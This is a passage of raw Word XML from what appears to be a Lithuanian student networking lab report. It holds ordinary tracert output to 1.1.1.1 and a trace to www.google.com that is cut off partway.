      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Rezultatą su komanda TRACERT [antrąjį DNS IP];</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9551"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="299240C8" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9911" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="081474D3" w14:textId="77777777"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PS C:\Users\IT&gt; tracert 1.1.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13D27F0C" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D60B246" w14:textId="77777777"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Tracing route to one.one.one.one [1.1.1.1]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51A3E2C6" w14:textId="77777777"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over a maximum of 30 hops:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B8A6FBE" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00924E65" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71AD2DAF" w14:textId="22D576C9"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1</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;1 ms</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;1 ms</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;1 ms</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>192.168.1.254</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78F7CF47" w14:textId="029F33A0"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2</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>1 ms</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>1 ms</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>1 ms</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:tab/>
              <w:t>53-79-9-254.static.zebra.lt [53.79.9.254]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50749398" w14:textId="260E35F6"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3</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>3 ms</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2 ms</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2 ms</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:tab/>
              <w:t>72-125-189-128.static.zebra.lt [72.125.189.128]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="290C2399" w14:textId="434080AB"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4</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Request timed out.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="123BBB79" w14:textId="78C68AA1"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5</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Request timed out.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78484377" w14:textId="58B08A6D"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6</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>18 ms</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>7 ms</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>9 ms</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>10.41.100.4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5172C0DD" w14:textId="0ED1E4EA"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7</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>5 ms</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>4 ms</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>5 ms</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>85-6-139-47.static.zebra.lt [85.6.139.47]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="109F18C9" w14:textId="602198AA"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8</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>3 ms</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>4 ms</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>3 ms</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>one.one.one.one [1.1.1.1]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42868DCB" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3EFA761E" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Trace complete.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6ACBF100" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Rezultatą su komanda TRACERT [ </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>www.google.lt</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tinklalapio IP].</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9551"/>
      </w:tblGrid>
      <w:tr w:rsidR="007467FF" w:rsidRPr="005A5C28" w14:paraId="75BBC579" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9911" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CE97D9E" w14:textId="77777777"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PS C:\Users\IT&gt; tracert www.google.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1484F08A" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4B0CA550" w14:textId="77777777"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Tracing route to www.google.com [172.217.16.4]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F2EDD55" w14:textId="77777777"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over a maximum of 30 hops:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AD7797E" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00924E65" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="39522FD2" w14:textId="29FD0027"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1</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;1 ms</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;1 ms</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;1 ms</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>192.168.1.254</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CFBFB62" w14:textId="5BA05296"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2</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>4 ms</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2 ms</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2 ms</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>53-79-9-254.static.zebra.lt [53.79.9.254]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CE8B2B3" w14:textId="45C4008A"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3</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2 ms</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2 ms</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
